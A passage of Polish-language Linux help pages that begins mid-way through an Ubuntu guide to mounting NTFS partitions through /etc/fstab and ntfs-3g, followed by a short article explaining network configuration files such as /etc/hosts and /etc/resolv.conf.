UUID=92701CA6701C9359 /media/sda5 ntfs defaults,utf8,umask=007,gid=46 0 0

Ostatecznie uzyskaliśmy takie dwa wpisy:

#/dev/sda1
UUID=A080692280690060 /media/sda1 ntfs defaults,utf8,umask=007,gid=46 0 0
#/dev/sda5
UUID=92701CA6701C9359 /media/sda5 ntfs defaults,utf8,umask=007,gid=46 0 0

Musisz je teraz umieścić w pliku fstab. Przejdź do okna edycji tego pliku i dodaj te wpisy na końcu. Ostatecznie Twój plik fstab powinien wyglądać podobnie do tego:

# /etc/fstab: static file system information.
#
# <file system> <mount point>   <type>  <options>       <dump>  <pass>
proc            /proc           proc    defaults        0       0
# /dev/sda7
UUID=343e5ec1-99ed-4682-a6cb-5aa6a8e1f44a /               ext3    relatime,errors=remount-ro 0       1
# /dev/sda6
UUID=bb2b23d0-b133-4ca7-b0cb-fc8aa44b32f7 none            swap    sw              0       0
/dev/scd0       /media/cdrom0   udf,iso9660 user,noauto,exec,utf8 0       0
/dev/fd0        /media/floppy0  auto    rw,user,noauto,exec,utf8 0       0
#/dev/sda5
UUID=92701CA6701C9359 /media/Pliki ntfs defaults,utf8,umask=007,gid=46 0 0
#/dev/sda1
UUID=A080692280690060  /media/System ntfs defaults,utf8,umask=007,gid=46 0 0

Zapisz plik (Ctrl + S) i uruchom ponownie komputer. Po restarcie na pulpicie powinny pokazać się zamontowane ikony partycji, do których teraz masz swobodny dostęp.

Co robić jeśli powyższy sposób nie pomógł?

1. Na początek spróbuj zamontować partycję ręcznie:

sudo mount -t ntfs-3g /dev/sdaX /media/sdaX

gdzie sdaX to numer partycji, a /media/sdaX to katalog w którym chcesz zamontować partycję.

2. Jeśli dostałeś podobną informację do tej:

$LogFile indicates unclean shutdown (0, 0) Failed to mount '/dev/sdaX': Operation not supported Mount is denied because NTFS is marked to be in use. Choose one action:

Choice 1: If you have Windows then disconnect the external devices by
clicking on the 'Safely Remove Hardware' icon in the Windows
taskbar then shutdown Windows cleanly.

Choice 2: If you don't have Windows then you can use the 'force' option for
your own responsibility. For example type on the command line:

mount -t ntfs-3g /dev/sdaX /media/sdaX -o force

Or add the option to the relevant row in the /etc/fstab file:

/dev/sdaX /media/sdaX ntfs-3g force 0 0

Wydaj w terminalu polecenie:

sudo mount -t ntfs-3g /dev/sdaX /media/sdaX -o force

I sprawdź czy partycja została zamontowana.

3. Teraz dodaj do /etc/fstab wpis, który będzie automatycznie montował partycję przy starcie systemu:

sudo gedit /etc/fstab

i dodaj wpis:

/dev/sdaX /media/sdaX ntfs-3g force 0 0

gdzie /dev/sdaX to numer partycji, a /media/sdaX to katalog, w którym będzie montowana partycja. Zapisz plik (Ctrl + S) i uruchom ponownie komputer, aby zobaczyć rezultaty.

Partycja się montuje, jednak nie masz prawa zapisu?

1. Otwórz terminal i zainstaluj dwa pakiety:

sudo apt-get install ntfs-3g ntfs-config

2. Po zakończonej instalacji wydaj polecenie:

gksu ntfs-config

3. W oknie, które Ci się pojawi zaznacz obie opcje i zapisz zmiany. Uruchom ponownie komputer.

 

Źródło: http://www.ubuntu-pomoc.org

Linux – konfiguracja sieci

Konfiguracja sieci

W systemie Linuks sieć jest w podstawowym zakresie konfigurowana już podczas instalacji. Wszystkie dane konfiguracyjne są przechowywane w katalogu /etc/ i jego podkatalogach.
Dużą dogodnością jest fakt, że Linuks, podobnie jak inne systemy Unixowe może być konfigurowany w czasie pracy, bez konieczności restartowania systemu, co znacznie upraszcza eksperymentowanie i poprawianie problemów konfiguracyjnych.

Najważniejsze pliki konfiguracyjne odpowiadające za działanie sieci to :

  • /etc/sysconfig/network
  • /etc/HOSTNAME
  • /etc/hosts
  • /etc/services
  • /etc/host.conf
  • /etc/resolv.conf

 

/etc/sysconfig/network

Plik network zawiera podstawowe informacje o konfiguracji sieci, takie jak :

NETWORKING
HOSTNAME
DOMAINNAME
GATEWAY
GATEWAYDEV
<YES> jeśli nasz host pracuje w sieci lub <NO> jeśli nie
<nazwa hosta>
<nazwa domeny>
<adres bramy sieciowej>
<nazwa urządzenia, które obsługuje bramę sieciową>

 

/etc/HOSTNAME/

Plik ten powinien zawierać tylko jeden wpis, określający główną nazwę naszego hosta .

 

/etc/hosts

Plik hosts zawiera odwzorowania adresów IP na nazwy komputerów, jak również aliasy tych nazw.
W praktyce plik ten wykorzystywany jest tylko wtedy, gdy nasza sieć nie posiada własnego serwera nazw (DNS).

Każdy wiersz tego pliku powinien składać się z następujących rekordów :

IP nazwa_hosta
np.:
192.168.1.12 stacja1

 

/etc/services

Plik services zawiera odwzorowania nazw usług sieciowych na numery portów wykorzystywanych przez komputer do obsługi danej usługi. Plik ten składa się z wierszy, z których każdy jest jednym rekordem informacji.

Każdy rekord składa się z trzech pól :

nazwa port/protokół aliasy # komentarz
np.:
www     80/tcp      http    # WWW

gdzie :

nazwa – oznacza słowo reprezentujące opisywaną usługę
port – jest numerem określający numer portu, pod którym będzie dostępna dana usługa
protokół – nazwa protokołu TCP lub UDP
aliasy – określają inne nazwy, pod którymi będzie dostępna usługa

 

/etc/host.conf

Plik host.conf zawiera dane o kolejności, w jakiej system powinien odpytywać różne systemy tłumaczeń nazw (DNS, NIS) przy rozwiązywaniu nazwy sieciowej.

Plik ten może składać się z następujących dyrektyw :

order – określa kolejność przepytywania systemów tłumaczeń nazw i może składać się z następujących opcji :
bind (DNS), hosts ( /etc/hosts), nis (NIS)
multi – określa, czy zapytanie kierowane do systemu rozwiązywania nazw zwraca tylko jeden wynik – off, czy może zwrócić ich kilka – on

 

/etc/resolv.conf

Plik resolv.conf jest plikiem konfiguracyjnym klienta DNS. Określa on kolejność przeszukiwania domen i zawiera adresy serwerów nazw.

Najczęściej przy konfiguracji tego pliku stosuje się trzy słowa kluczowe :

nameserver – określa adres serwera DNS
domain – określa nazwę domeny, do której należy komputer
search – określa kolejność przeszukiwania domen